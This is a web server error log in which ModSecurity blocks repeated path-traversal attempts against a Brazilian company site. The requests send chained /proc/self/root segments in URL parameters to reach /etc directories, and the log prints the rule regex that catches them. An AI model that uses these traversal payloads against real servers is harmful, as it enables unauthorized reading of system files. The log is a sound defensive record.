[Mon Mar 16 16:19:35.836510 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.243.203:44004] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXx_9ocpUE4ed4uDwDZAAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:19:39.322463 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.243.203:58534] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXy_9ocpUE4ed4uDwDZwAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:19:39.662053 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.244.31:38086] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhXy7ABkC4fWIHEf8ECagAAAFg"]
[Mon Mar 16 16:19:42.744654 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.243.203:43112] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXzrysWC90G-1nBrBU-wAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:19:59.729125 2026] [:error] [pid 15568:tid 140411574073088] [client 74.7.243.203:43122] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhX36QpVkWug9HeOt9HhgAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:20:03.826139 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.243.203:41140] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhX49SswJuvopo3lOhv9wAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:20:33.246621 2026] [:error] [pid 15061:tid 140411649607424] [client 74.7.243.203:41150] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYAaTCbgAP5jq5Teg9jQAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:20:39.949694 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.243.203:45090] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYB46lpbStxTqkSkt8fAAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:20:44.428737 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.243.203:60534] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYDLysWC90G-1nBrBVBQAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:20:45.739444 2026] [:error] [pid 29802:tid 140411691570944] [client 74.7.243.203:60546] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYDc_BxrYCr4hPDw_8DAAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:20:49.261027 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.243.203:60562] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYEY6lpbStxTqkSkt8fgAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:21:08.340183 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.243.203:33076] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYJLABkC4fWIHEf8ECxgAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:21:09.646133 2026] [:error] [pid 14895:tid 140411725141760] [client 74.7.243.203:35590] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYJVajLEzk2WiQ-10jjwAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:21:14.015894 2026] [:error] [pid 29802:tid 140411699963648] [client 74.7.241.46:45974] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYKs_BxrYCr4hPDw_8JAAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:21:15.331704 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:34526] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYK7ysWC90G-1nBrBVCAAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:21:44.795549 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.241.46:34538] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYSP9ocpUE4ed4uDwDkgAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:22:00.024580 2026] [:error] [pid 29507:tid 140411574073088] [client 74.7.241.46:54218] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYWEr9dMAiw-8KANNXlwAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:23:10.182149 2026] [mime_magic:error] [pid 15568:tid 140411624429312] (70014)End of file found: [client 74.7.243.203:50216] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/include/bits
[Mon Mar 16 16:23:14.879571 2026] [:error] [pid 15061:tid 140411733534464] [client 74.7.243.203:51522] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYoqTCbgAP5jq5Teg9rgAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:23:16.465560 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.243.203:51528] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYpNSswJuvopo3lOhwbQAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:23:40.891844 2026] [:error] [pid 14895:tid 140411674785536] [client 74.7.241.46:59254] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYvFajLEzk2WiQ-10kDgAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:23:46.446968 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.243.203:51530] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYwrysWC90G-1nBrBVgQAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:23:47.808546 2026] [:error] [pid 15568:tid 140411649607424] [client 74.7.243.203:52250] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYw6QpVkWug9HeOt9HoAAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
